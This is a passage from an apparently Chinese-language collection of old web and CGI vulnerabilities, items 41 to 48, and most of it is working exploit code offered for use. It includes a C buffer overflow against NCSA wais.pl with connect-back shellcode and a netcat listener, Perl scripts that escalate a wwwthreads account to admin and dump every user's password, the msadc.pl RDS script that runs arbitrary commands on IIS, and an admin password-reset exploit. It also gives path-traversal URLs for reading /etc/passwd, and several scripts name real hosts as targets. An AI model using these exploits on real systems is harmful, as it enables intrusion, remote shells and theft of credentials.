(入侵者感兴趣的文件也许将会是:/system/filelist.dat, /system/version.dat,/system/keys, /system/core, etc) 四十一.wais.pl + waisq CGI wais.pl + waisq是运行在NCSA服务器上的一个WAIS接口CGI,在这个程序内部存在一个漏洞,能使攻击者通过远程溢出获得一个具有web server相同权限的shell。 /* OnWaisKlote.c - NCSA wais.pl + waisq remote overflow - by Scrippie The shellcode makes a connetion to the given IP and spawns a shell on port 27002. It\'s recommended to have a listening netcat ready on this port. Ie. do a \"nc -l -p 27002\" on your machine, and run the exploit on the target If everything works out, it\'ll connect and spawn a shell. */ #include #include #include #include #include #include #include #define FORBIDDEN \"x00x09x0bx0crn{};<>\\^()*[]$`&#~|\"\" #define SZ_SOURCEBUF 256 #define SZ_FILEBUF 256 #define RETADDY 0xbffff910 /* Works on my cute `lil box */ int wwwconnect(unsigned long ip); int ICinInt(long, char *, size_t); char *buildOverflow(unsigned long, unsigned int); void *xmalloc(size_t); /* Shellcode written by: Scrippie :) Smegma v0.5 ridded this shellcode of the following characters: \"x00x09x0bx0crn{};<>\\^()*[]$`&#~|\"\" For this purpose a xor mask of 0x92011e11 was brute forced */ char hellcode[] = \"xebx14x58x89xc6x31xc9xb1x25x81x36x11x1ex01x92x83xc6x04xe2\" \"xf5xebx05xe8xe7xffxffxffxfax64x5fxa3xd1x2fxdaxa3xc3xaex67\" \"x21x10x93x4fx8exa3x1fx88xc4x31xacx07x1bx47x3axb3x90x98x48\" \"x1dx5fx91x97x47x8ax98x08x67x55x57x1cx68xe8x98x58x1dx1fx17\" \"x97x47xb2x91xdcx0fx1bx47x3ax30x52x15x78x81x51x13x93x4fx8e\" \"xdcx9ex30x52x15x21x88x50x9ax40x19xa3xd8xd3x81x1bxc1x5fxcc\" \"x12x98xcex40x5fx91x2fxc1x1fx6fx11x81x53x16xedxabx96x1ax93\" \"x5fx9ax98x40x11x1fx5fx0ex30x40xdcx9ex30x52xefxdexccx12xf9\" \"x9fxfex6dxeex5fx40xd0x53xAAxAAxAAxAAx31x63xfbx7fx31x72xfa\"; /* The IP address to connect to is gonna be at 0xAAAAAAAA */ /* Make sure it\'s encoded just as the shellcode is */ int main(int argc, char **argv) { char *iploc, *evilcode; int sd, align=0; unsigned long sip; /* IP to connect back to */ unsigned long dip; /* Target IP */ unsigned 
long retaddy=RETADDY; /* Default return address */ /* Whee, print the banner */ if(argc < 3) { printf(\"OnWais Klote - Scrippie/Synnergy Networksn\"); printf(\"Use as: %s [ret addy] [align]n\", argv[0]); exit(0); } printf(\"******************************************************n\"); printf(\"+ OnWais Klote - Scrippie/Synnergy.net +n\"); printf(\"******************************************************n\"); /* I know inet_addr() is obsolete - too bad, you can\'t run this program when you\'re on 255.255.255.255 - who is anyway? */ if((dip = inet_addr(argv[1])) == -1) { printf(\"Error: Non valid IP address specifiedn\"); exit(-1); } if((sip = inet_addr(argv[2])) == -1) { printf(\"Error: Non valid IP address specifiedn\"); exit(-1); } /* Use specified return address */ if(argc > 3) { retaddy = strtoul(argv[3], NULL, 16); } printf(\"Return address : 0x%lxn\", retaddy); /* Use specified alignment */ if(argc > 4) { align = atoi(argv[4]); } printf(\"Alignment : %dn\", align); printf(\"Target : %snn\", argv[1]); /* We convert our IP to fit in the payload */ /* Think of this as a strange value? 
Think of the shellcode alignment */ sip ^= 0x1192011e; /* Check if the given RETADDY won\'t ruin our payload */ if(ICinInt(retaddy, FORBIDDEN, sizeof(FORBIDDEN)-1)) { printf(\"Error: Found illegal character in return addressn\"); exit(0); } /* Check if the given IP won\'t ruin our shellcode */ if(ICinInt(sip, FORBIDDEN, sizeof(FORBIDDEN)-1)) { printf(\"Error: Found illegal character in IP addressn\"); exit(0); } /* Locate the IP position in the shellcode */ iploc=(char *)strchr(hellcode, 0xAA); memcpy((void *) iploc, (void *) &sip, 4); evilcode = buildOverflow(retaddy, align); sd = wwwconnect(dip); printf(\"Connected to %sn\", argv[1]); printf(\"Proceeding to send evil code...n\"); send(sd, evilcode, strlen(evilcode), 0); printf(\"Sent!n\"); return(0); } char *buildOverflow(unsigned long retaddy, unsigned int align) { char source[SZ_SOURCEBUF]; char *smash, *output; int c; smash = (char *)xmalloc(SZ_FILEBUF+align+1); output = (char *)xmalloc(SZ_SOURCEBUF+SZ_FILEBUF+align+1); for(c=0;c source[253] = 0xeb; /* Jump over few bytes between arrays on stack */ source[254] = 0x08; source[255] = 0x00; /* Directory and Sourcename follow each other on stack closely There are a few arbitrary bytes between them, therefore we jump over them with 0xeb 0x08 and land somewhere in the given NOPS */ memset(smash, 0x90, 7+align); /* Few nops on the stack - waisq ruins some bytes */ smash[7+align] = 0xeb; /* Jump over the EIP that we overflow */ smash[8+align] = 0x04; /* It\'s 4 bytes big */ /* Return address gets choked in here */ memcpy(smash+9+align, &retaddy, 4); smash[13+align] = 0x00; /* strcat() needs the delimiter :) */ strcat(smash, hellcode); /* Copy the shellcode */ sprintf(output, \"GET /cgi-bin/wais.pl?-s+%s+-t+%s HTTP/1.0nn\", source, smash); /* Stuff it all on the heap */ free(smash); return(output); /* And return the pointer there */ } /* Connects to a webserver \"ip\" is expected to be in network byte order */ int wwwconnect(unsigned long ip) { struct sockaddr_in sa; 
/* Sockaddr */ int sd; /* Socket Descriptor */ if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror(\"socket()\"); exit(-1); } memset(&sa, 0x00, sizeof(struct sockaddr_in)); sa.sin_port=htons(80); sa.sin_addr.s_addr=ip; if(connect(sd, &sa, sizeof(struct sockaddr_in)) == -1) { perror(\"connect()\"); exit(-1); } return(sd); } /* This function checks for illegal bytes in \"long\" types */ int ICinInt(long s, char *forbidden, size_t fsize) { int i,j; for(i=0;i for(j=0;j if((char)(s >> j*8) == forbidden) return(1); } } return(0); } /* Wrapper for malloc() that does error checking */ void *xmalloc(size_t size) { void *blah; if((blah = malloc(size)) == NULL) { perror(\"malloc()\"); exit(-1); } return(blah); } ------------------------- END ----------------------------------------------------- 四十二.wwwthreads wwwthreads是应用很广的论坛服务程序,在一些国外的安全论坛上应用较多。这套论坛程序有个漏洞,其SQL information retrieval engine允许远程用户获取用户名和密码,允许入侵者使用insert的SQL命令,获取数据库的访问权。在一个全世界最著名的黑客站点之一的论坛上测试通过。 Exploit: -[ wwwthreads.pl #!/usr/bin/perl # wwwthreads hack by rfp@wiretrip.net # elevate a user to admin status # # by rain forest puppy / rfp@wiretrip.net use Socket; ##################################################### # modify these # can be DNS or IP address $ip=\"209.143.242.119\"; $username=\"rfp\"; # remember to put a \'\' before the \'$\' characters $passhash=\"$1$V2$sadklfjasdkfhjaskdjflh\"; ##################################################### $parms=\"Cat=&Username=$username&Oldpass=$passhash\". \"&sort_order=5,U_Status%3d\'Administrator\',U_Security%3d100\". \"&display=threaded&view=collapsed&PostsPer=10\". \"&Post_Format=top&Preview=on&TextCols=60&TextRows=5&FontSize=0\". \"&FontFace=&PictureView=on&PicturePost=off\"; $tosend=\"GET /cgi-bin/wwwthreads/changedisplay.pl?$parms HTTP/1.0rn\". 
\"Referer: http://$ip/cgi-bin/wwwthreads/previewpost.plrnrn\"; print sendraw($tosend); sub sendraw { my ($pstr)=@_; my $target; $target= inet_aton($ip) || die(\"inet_aton problems\"); socket(S,PF_INET,SOCK_STREAM,getprotobyname(\'tcp\')||0) || die(\"Socket problemsn\"); if(connect(S,pack \"SnA4x8\",2,80,$target)){ select(S); $|=1; print $pstr; my @in=<S>; select(STDOUT); close(S); return @in; } else { die(\"Can\'t connect...n\"); }} -[ w3tpass.pl #!/usr/bin/perl # download all wwwthread usernames/passwords once you\'re administrator # send a fake cookie with authentication and fake the referer # initial passwords are 6 chars long, contain a-zA-Z0-9 EXCEPT l,O,1 # # by rain forest puppy / rfp@wiretrip.net use Socket; ##################################################### # modify these # can be DNS or IP address $ip=\"209.143.242.119\"; $username=\"rfp\"; # remember to put a \'\' before the \'$\' characters $passhash=\"$1$V2$zxcvzxvczxcvzxvczxcv\"; ##################################################### @letts=split(//,\'0ABCDEFGHIJKLMNOPQRSTUVWXYZ\'); print STDERR \"wwwthreads password snatcher by rain forest puppyrn\"; print STDERR \"Getting initial user lists...\"; foreach $let (@letts){ $parms=\"Cat=&Start=$let\"; $tosend=\"GET /cgi-bin/wwwthreads/admin/showusers.pl?$parms HTTP/1.0rn\". \"Referer: http://$ip/cgi-bin/wwwthreads/rn\". \"Cookie: Username=$username; Password=$passhashrnrn\"; my @D=sendraw($tosend); foreach $line (@D){ if($line=~/showoneuser.pl?User=([^\"]+)\">/){ push @users, $1;}}} $usercount=@users; print STDERR \"$usercount users retrieved.rn\". \"Fetching individual passwords...rn\"; foreach $user (@users){ $parms=\"User=$user\"; $tosend=\"GET /cgi-bin/wwwthreads/admin/showoneuser.pl?$parms HTTP/1.0rn\". \"Referer: http://$ip/cgi-bin/wwwthreads/rn\". 
\"Cookie: Username=$username; Password=$passhashrnrn\"; my @D=sendraw($tosend); foreach $line (@D){ if($line=~/OldPass value = \"([^\"]+)\"/){ ($pass=$1)=~ s/%([a-fA-F0-9][a-fA-F0-9])/pack(\"C\", hex($1))/eg; $user =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack(\"C\", hex($1))/eg; print $user.\':\'.$pass.\"::::::::::n\"; last;}}} print STDERR \"done.rnrn\"; sub sendraw { my ($pstr)=@_; my $target; $target= inet_aton($ip) || die(\"inet_aton problems\"); socket(S,PF_INET,SOCK_STREAM,getprotobyname(\'tcp\')||0) || die(\"Socket problemsn\"); if(connect(S,pack \"SnA4x8\",2,80,$target)){ select(S); $|=1; print $pstr; my @in=<S>; select(STDOUT); close(S); return @in; } else { die(\"Can\'t connect...n\"); }} 四十三.msadcs.dll IIS 4.0的缺省安装设置的是MDAC1.5,这个安装下有一个/msadc/msadcs.dll的文件,也允许通过web远程访问ODBC,获取系统的控制权.、如果web目录下的/msadc/msadcs.dll/可以访问,那么ms的任何补丁可能都没用,用类似: /%6Dsadc/%6Dsadcs.dll/V%62BusO%62j.V%62BusO%62jCls.GetRecordset 的请求,就可以绕过安全机制进行非法的VbBusObj请求,从而达到入侵的目的。 攻击程序: #将下面这段保存为txt文件,然后: \"perl -x 文件名\" #!perl # # MSADC/RDS \'usage\' (aka exploit) script # # by rain.forest.puppy # # Many thanks to Weld, Mudge, and Dildog from l0pht for helping me # beta test and find errors! 
use Socket; use Getopt::Std;
getopts("e:vd:h:XR", \%args);

print "-- RDS exploit by rain forest puppy / ADM / Wiretrip --\n";

if (!defined $args{h} && !defined $args{R}) {
print qq~
Usage: msadc.pl -h <host> { -d <delay> -X -v }
 -h <host> = host you want to scan (ip or domain)
 -d <seconds> = delay between calls, default 1 second
 -X = dump Index Server path table, if available
 -v = verbose
 -e = external dictionary file for step 5

 Or a -R will resume a command session

~; exit;}

$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";

if (defined $args{v}) { $verbose=1; } else {$verbose=0;}
if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
if(!defined $args{R}){ $ip.="." if ($ip=~/[a-z]$/);
 $target= inet_aton($ip) || die("inet_aton problems; host doesn't exist?");}

if (defined $args{X} && !defined $args{R}) { &hork_idx; exit; }

if (!defined $args{R}){ $ret = &has_msadc;
 die("Looks like msadcs.dll doesn't exist\n")if $ret==0}

print "Please type the NT commandline you want to run (cmd /c assumed):\n"
 . "cmd /c ";
$in=<STDIN>; chomp $in;
$command="cmd /c " . $in ;

if (defined $args{R}) {&load; exit;}

print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
&try_btcustmr;

print "\nStep 2: Trying to make our own DSN...";
&make_dsn ? print "<<success>>\n" : print "<<fail>>\n";

print "\nStep 3: Trying known DSNs...";
&known_dsn;

print "\nStep 4: Trying known .mdbs...";
&known_mdb;

if (defined $args{e}){
print "\nStep 5: Trying dictionary of DSN names...";
&dsn_dict; } else { print "\nNo -e; Step 5 skipped.\n\n"; }

print "Sorry Charley...maybe next time?\n";
exit;

##############################################################################

sub sendraw { # ripped and modded from whisker
 sleep($delay); # it's a DoS on the server! At least on mine...
 my ($pstr)=@_;
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
 die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,80,$target)){
 select(S); $|=1;
 print $pstr; my @in=<S>;
 select(STDOUT); close(S);
 return @in;
 } else { die("Can't connect...\n"); }}

##############################################################################

sub make_header { # make the HTTP request
 # the blank lines in the heredoc are part of the request; $clen (206 + the
 # length of $reqlen + $reqlen) is computed against exactly this layout
 my $msadc=<<EOT
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1
User-Agent: ACTIVEDATA
Host: $ip
Content-Length: $clen
Connection: Keep-Alive

ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3

--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: $reqlen

EOT
; $msadc=~s/\n/\r\n/g;
 return $msadc;}

##############################################################################

sub make_req { # make the RDS request
 my ($switch, $p1, $p2)=@_;
 my $req=""; my ($t1, $t2, $query, $dsn);

 if ($switch==1){ # this is the btcustmr.mdb query
 $query="Select * from Customers where City=" . make_shell();
 $dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
 $p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}

 elsif ($switch==2){ # this is general make table query
 $query="create table AZZ (B int, C varchar(10))";
 $dsn="$p1";}

 elsif ($switch==3){ # this is general exploit table query
 $query="select * from AZZ where C=" . make_shell();
 $dsn="$p1";}

 elsif ($switch==4){ # attempt to hork file info from index server
 $query="select path from scope()";
 $dsn="Provider=MSIDXS;";}

 elsif ($switch==5){ # bad query
 $query="select";
 $dsn="$p1";}

 # RDS request body: query and DSN as UTF-16LE strings with 16-bit lengths
 $t1= make_unicode($query);
 $t2= make_unicode($dsn);
 $req = "\x02\x00\x03\x00";
 $req.= "\x08\x00" . pack ("S1", length($t1));
 $req.= "\x00\x00" . $t1 ;
 $req.= "\x08\x00" . pack ("S1", length($t2));
 $req.= "\x00\x00" . $t2 ;
 $req.="\r\n--!ADM!ROX!YOUR!WORLD!--\r\n";
 return $req;}

##############################################################################

sub make_shell { # this makes the shell() statement (Jet/VBA shell() runs the command)
 return "'|shell(\"$command\")|'";}

##############################################################################

sub make_unicode { # quick little function to convert to unicode
 my ($in)=@_; my $out;
 for ($c=0; $c < length($in); $c++) {
 $out.=substr($in,$c,1) . "\x00"; }
 return $out;}

##############################################################################

sub rdo_success { # checks for RDO return success (this is kludge)
 my (@in) = @_; my $base=content_start(@in);
 if($in[$base]=~/multipart\/mixed/){
 return 1 if( $in[$base+10]=~/^\x09\x00/ );}
 return 0;}

##############################################################################

sub make_dsn { # this makes a DSN for us
 my @drives=("c","d","e","f");
 print "\nMaking DSN: ";
 foreach $drive (@drives) {
 print "$drive: ";
 my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft%2B" .
 "Access%2BDriver%2B%28*.mdb%29&dsn=wicca&dbq=" . $drive .
 "%3A%5Csys.mdb&newdb=CREATE_DB&attr= HTTP/1.0\n\n");
 $results[0]=~m#HTTP/([0-9.]+) ([0-9]+) ([^\n]*)#;
 return 0 if $2 eq "404"; # not found/doesn't exist
 if($2 eq "200") {
 foreach $line (@results) {
 return 1 if $line=~/<H2>Datasource creation successful<\/H2>/;}} }
 return 0;}

##############################################################################

sub verify_exists {
 my ($page)=@_;
 my @results=sendraw("GET $page HTTP/1.0\n\n");
 return $results[0];}

##############################################################################

sub try_btcustmr {

 my @drives=("c","d","e","f");
 my @dirs=("winnt","winnt35","winnt351","win","windows");

 foreach $dir (@dirs) {
 print "$dir -> "; # fun status so you can see progress
 foreach $drive (@drives) {
 print "$drive: "; # ditto
 $reqlen=length( make_req(1,$drive,$dir) ) - 28;
 $reqlenlen=length( "$reqlen" );
 $clen= 206 + $reqlenlen + $reqlen;

 my @results=sendraw(make_header() . make_req(1,$drive,$dir));
 if (rdo_success(@results)){print "Success!\n";save(1,1,$drive,$dir);exit;}
 else { verbose(odbc_error(@results)); funky(@results);}}
 print "\n";}}

##############################################################################

sub odbc_error {
 my (@in)=@_;
 my $base = content_start(@in);
 if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
 $in[$base+4]=~s/[^a-zA-Z0-9 \[\]:\/\\'()]//g;
 $in[$base+5]=~s/[^a-zA-Z0-9 \[\]:\/\\'()]//g;
 $in[$base+6]=~s/[^a-zA-Z0-9 \[\]:\/\\'()]//g;
 return $in[$base+4].$in[$base+5].$in[$base+6];}
 print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n";
 print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
 $in[$base+4] . $in[$base+5] . $in[$base+6];
 exit;}

##############################################################################

sub verbose {
 my ($in)=@_;
 return if !$verbose;
 print STDOUT "\n$in\n";}

##############################################################################

sub save {
 my ($p1, $p2, $p3, $p4)=@_;
 open(OUT, ">rds.save") || print "Problem saving parameters...\n";
 print OUT "$ip\n$p1\n$p2\n$p3\n$p4\n";
 close OUT;}

##############################################################################

sub load {
 my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)}; dbq=";
 open(IN,"<rds.save") || die("Couldn't open rds.save\n");
 @p=<IN>; close(IN);
 $ip="$p[0]"; $ip=~s/\n//g;
 $ip.="." if ($ip=~/[a-z]$/);
 $target= inet_aton($ip) || die("inet_aton problems");
 print "Resuming to $ip ...";
 $p[3]="$p[3]"; $p[3]=~s/\n//g;
 $p[4]="$p[4]"; $p[4]=~s/\n//g;

 if($p[1]==1) {
 $reqlen=length( make_req(1,"$p[3]","$p[4]") ) - 28;
 $reqlenlen=length( "$reqlen" );
 $clen= 206 + $reqlenlen + $reqlen;
 my @results=sendraw(make_header() . make_req(1,"$p[3]","$p[4]"));
 if (rdo_success(@results)){print "Success!\n";}
 else { print "failed\n"; verbose(odbc_error(@results));}}

 elsif ($p[1]==3){
 if(run_query("$p[3]")){
 print "Success!\n";} else { print "failed\n"; }}

 elsif ($p[1]==4){
 if(run_query($drvst . "$p[3]")){
 print "Success!\n"; } else { print "failed\n"; }}
 exit;}

##############################################################################

sub create_table {
 my ($in)=@_;
 $reqlen=length( make_req(2,$in,"") ) - 28;
 $reqlenlen=length( "$reqlen" );
 $clen= 206 + $reqlenlen + $reqlen;
 my @results=sendraw(make_header() . make_req(2,$in,""));
 return 1 if rdo_success(@results);
 my $temp= odbc_error(@results); verbose($temp);
 return 1 if $temp=~/Table 'AZZ' already exists/;
 return 0;}

##############################################################################

sub known_dsn {
 # we want 'wicca' first, because if step 2 made the DSN, it's ready to go
 my @dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
 "cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
 "banner", "banners", "ads", "ADCDemo", "ADCTest");

 foreach $dSn (@dsns) {
 print ".";
 next if (!is_access("DSN=$dSn"));
 if(create_table("DSN=$dSn")){
 print "$dSn successful\n";
 if(run_query("DSN=$dSn")){
 print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; }
 else { print "Something's borked. Use verbose next time\n";}}}
 print "\n";}

##############################################################################

sub is_access {
 my ($in)=@_;
 $reqlen=length( make_req(5,$in,"") ) - 28;
 $reqlenlen=length( "$reqlen" );
 $clen= 206 + $reqlenlen + $reqlen;
 my @results=sendraw(make_header() . make_req(5,$in,""));
 my $temp= odbc_error(@results);
 verbose($temp);
 return 1 if ($temp=~/Microsoft Access/);
 return 0;}

##############################################################################

sub run_query {
 my ($in)=@_;
 $reqlen=length( make_req(3,$in,"") ) - 28;
 $reqlenlen=length( "$reqlen" );
 $clen= 206 + $reqlenlen + $reqlen;
 my @results=sendraw(make_header() . make_req(3,$in,""));
 return 1 if rdo_success(@results);
 my $temp= odbc_error(@results); verbose($temp);
 return 0;}

##############################################################################

sub known_mdb {
 my @drives=("c","d","e","f","g");
 my @dirs=("winnt","winnt35","winnt351","win","windows");
 my ($dir, $drive, $mdb);
 my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq=";

 # this is sparse, because I don't know of many
 my @sysmdbs=( "\\catroot\\icatalog.mdb",
 "\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
 "\\system32\\certmdb.mdb",
 "\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%

 my @mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
 "\\cfusion\\cfapps\\forums\\forums_.mdb",
 "\\cfusion\\cfapps\\forums\\data\\forums.mdb",
 "\\cfusion\\cfapps\\security\\realm_.mdb",
 "\\cfusion\\cfapps\\security\\data\\realm.mdb",
 "\\cfusion\\database\\cfexamples.mdb",
 "\\cfusion\\database\\cfsnippets.mdb",
 "\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb",
 "\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb",
 "\\cfusion\\brighttiger\\database\\cleam.mdb",
 "\\cfusion\\database\\smpolicy.mdb",
 "\\cfusion\\database\\cypress.mdb",
 "\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb",
 "\\website\\cgi-win\\dbsample.mdb",
 "\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
 "\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb" ); #these are just

 foreach $drive (@drives) {
 foreach $dir (@dirs){
 foreach $mdb (@sysmdbs) {
 print ".";
 if(create_table($drv . $drive . ":\\" . $dir . $mdb)){
 print "\n" . $drive . ":\\" . $dir . $mdb . " successful\n";
 if(run_query($drv . $drive . ":\\" . $dir . $mdb)){ print "Success!\n";
 save (4,4,$drive . ":\\" . $dir . $mdb,""); exit; }
 else { print "Something's borked. Use verbose next time\n"; }}}}}

 foreach $drive (@drives) {
 foreach $mdb (@mdbs) {
 print ".";
 # drive letter, colon, then the absolute path (the copy this was taken from
 # had the leftover $dir here, which glued a directory name onto the drive letter)
 if(create_table($drv . $drive . ":" . $mdb)){
 print "\n" . $drive . ":" . $mdb . " successful\n";
 if(run_query($drv . $drive . ":" . $mdb)){ print "Success!\n";
 save (4,4,$drive . ":" . $mdb,""); exit; }
 else { print "Something's borked. Use verbose next time\n"; }}}}
 }

##############################################################################

sub hork_idx {
 print "\nAttempting to dump Index Server tables...\n";
 print " NOTE: Sometimes this takes a while, other times it stalls\n\n";
 $reqlen=length( make_req(4,"","") ) - 28;
 $reqlenlen=length( "$reqlen" );
 $clen= 206 + $reqlenlen + $reqlen;
 my @results=sendraw2(make_header() . make_req(4,"",""));
 if (rdo_success(@results)){
 my $max=@results; my $c; my %d;
 for($c=19; $c<$max; $c++){
 $results[$c]=~s/\x00//g;
 $results[$c]=~s/[^a-zA-Z0-9:~ \\._]{1,40}/\n/g;
 $results[$c]=~s/[^a-zA-Z0-9:~ \\._\n]//g;
 $results[$c]=~/([a-zA-Z]:\\)([a-zA-Z0-9 _~\\]+)\\/;
 $d{"$1$2"}="";}
 foreach $c (keys %d){ print "$c\n"; }
 } else {print "Index server doesn't seem to be installed.\n"; }}

##############################################################################

sub dsn_dict {
 open(IN, "<$args{e}") || die("Can't open external dictionary\n");
 while(<IN>){
 $hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print ".";
 next if (!is_access("DSN=$dSn"));
 if(create_table("DSN=$dSn")){
 print "$dSn successful\n";
 if(run_query("DSN=$dSn")){
 print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; }
 else { print "Something's borked. Use verbose next time\n";}}}
 print "\n"; close(IN);}

##############################################################################

sub sendraw2 { # ripped and modded from whisker
 sleep($delay); # it's a DoS on the server! At least on mine...
 my ($pstr)=@_;
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
 die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,80,$target)){
 print "Connected. Getting data";
 open(OUT,">raw.out");
 my @in;
 select(S); $|=1;
 print $pstr;
 while(<S>){ print OUT $_; push @in, $_; print STDOUT ".";}
 close(OUT); select(STDOUT); close(S); return @in;
 } else { die("Can't connect...\n"); }}

##############################################################################

sub content_start { # this will take in the server headers
 my (@in)=@_; my $c;
 for ($c=1;$c<500;$c++) {
 if($in[$c] =~/^\x0d\x0a/){
 if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
 else { return $c+1; }}}
 return -1;} # it should never get here actually

##############################################################################

sub funky {
 my (@in)=@_; my $error=odbc_error(@in);
 if($error=~/ADO could not find the specified provider/){
 print "\nServer returned an ADO miscofiguration message\nAborting.\n";
 exit;}
 if($error=~/A Handler is required/){
 print "\nServer has custom handler filters (they most likely are patched)\n";
 exit;}
 if($error=~/specified Handler has denied Access/){
 print "\nServer has custom handler filters (they most likely are patched)\n";
 exit;}}

##############################################################################

sub has_msadc {
 my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n");
 my $base=content_start(@results);
 return 1 if($results[$base]=~/Content-Type: application\/x-varg/);
 return 0;}

########################

44. SmartWin CyberOffice Shopping Cart

Smartwin Technology CyberOffice Shopping Cart is a shopping-cart application used on e-commerce sites running Windows NT 4.0 or 2000. A remote user can read the _private directory of a site running CyberOffice Shopping Cart 2.0: by default everyone has read access to _private, and the cart's database sits there.

Attack: http://target/_private/shopping_cart.mdb

45. Moreover.com CGI file disclosure vulnerability

The cached_feed.cgi v1.0 script supplied by the news provider Moreover.com has a file-fetch function whose purpose is to return the contents of a given file to the browser. Because it does not filter the string ".." out of user input, a crafted URL makes the script return files it was never meant to serve; the only requirement is that the file be readable by the HTTP user.

Attack: http://victim/cgi-bin/cached_feed.cgi?../../../.+/etc/passwd

46. 
UnixWare SCOhelp CGI format string vulnerability

The default SCO UnixWare 7 installation includes the scohelp component, an HTTP server listening on TCP port 457 that gives users access to the manual pages and other documentation. The CGI program that implements its search function has a format string vulnerability which allows a remote user to execute arbitrary code on the host. Although the attacker only gets the privileges of the 'nobody' user (by default), that is still an unauthorized foothold on the system from which to try for higher privileges.

Attack: http://target:457/search97cgi/vtopic?Action=FilterSearch&filter=&queryText=%25x

(%25x is the URL encoding of %x, so the format directive reaches the server's sprintf unchanged.) The server responds with:

--
Internal error: STR_sprintf: Invalid format (Error E1-0142 (Query Builder): Invalid character '%' (0x25))
Result Search failed: -40
Result Error E1-0142 (Query Builder): Invalid character '
Result Error E1-0130 (Query Builder): Syntax error in query string near character 1
Result Error E1-0133 (Query Builder): Error parsing query: 81887e0
Result VdkSearchNew failed, error -40
Result Request failed for REQUEST_METHOD=, QUERY_STRING=
Component Component (vsearch) failed in processing request, -2
Action Action (FilterSearch) failed while processing request in component (vsearch), -2
Service Manager Action (FilterSearch) failed in processing request, -2
S97IS Service manager failed to process request

47. Subscribe Me LITE administrator password change vulnerability

Any remote user can change the administrator password of CGI Script Center's Subscribe Me Lite. This gives the remote user full administrative control, including adding users to and removing them from the mailing list.

Attack:

#!/usr/bin/perl -w
## Subscribe Me Lite 2.0 exploit / www.cgiscriptcenter.com
## This exploits changes the administrator password and
## let's anyone take over the mailing list. You can send
## bogus e-mail to everyone on the list.
##
## May work on earlier versions, but not sure - not sure
## if it will work on the Professional version either.
##
## teleh0r@doglover.com / anno 2000
## httpd://teleh0r.cjb.net

use strict;
use Socket;

if (@ARGV < 2) {
    print("Usage: $0 <target> <newpass>\n");
    exit(1);
}

my($target,$newpass,$crypt,$length,$command,$agent,$sploit,$iaddr,$paddr,$proto);
($target,$newpass) = @ARGV;
$crypt = crypt($newpass, 'aa');

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/subscribe.pl\n");
print("New password: $newpass / $crypt\n\n");

# the script sets the admin password from pwd/pwd2 without asking for the old one
$command = "pwd=$newpass&pwd2=$newpass&setpwd=++Set+Password++";
# Content-length is computed from the body (the hard-coded 34 + length($newpass)
# in the posted copy is short by one copy of the password)
$length = length($command);
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

$sploit= "POST /cgi-bin/subscribe.pl HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: $length

$command";

$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n");
close(SOCKET);

sleep(2);
print("Check out: http://$target/cgi-bin/subscribe.pl\n");
exit(0);

48. Htgrep CGI program discloses system file contents

The htgrep.pl script in htgrep has a security problem: a remote user can read any system file with the privileges of the user the web server runs as. The hdr parameter is meant to name a header file to prepend to the output and is opened without any check.

Attack:

http://www.dematel.com/cgibin/htgrep/file=index.html&hdr=/etc/passwd

A perl script:

#!/usr/local/bin/perl
#
# Htgrep EXPLOIT Script by n30 17/8/2000
#
# For: Unix/Linux all Distro's
# maybe Winnt?? anyone??
#
# Versions: All upto latest: htgrep v3.0
#
# Info: to find the version number being used:
#
# www.server.com/cgi-bin/htgrep/version
#
# Some ppl use a wrapper for the script thusly
# eliminating the file argument, the sploit will
# still werk just add &hdr=<filename> to the end :-)
#
# if &isindex=<text> is present in the URL REMOVE IT!!!
# or else the exploit won't werk :-)
#
# Mail : n30@gmx.co.uk

use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;

my $ua = new LWP::UserAgent;

# *************************************************
my $TargetHost="www.dematel.com";
my $TargetPath="/cgibin/htgrep";
# SearchFile can commonly be index.html or some other file in the wwwroot
my $SearchFile="index.html";
# FiletoGet ?? think for ur self :-)
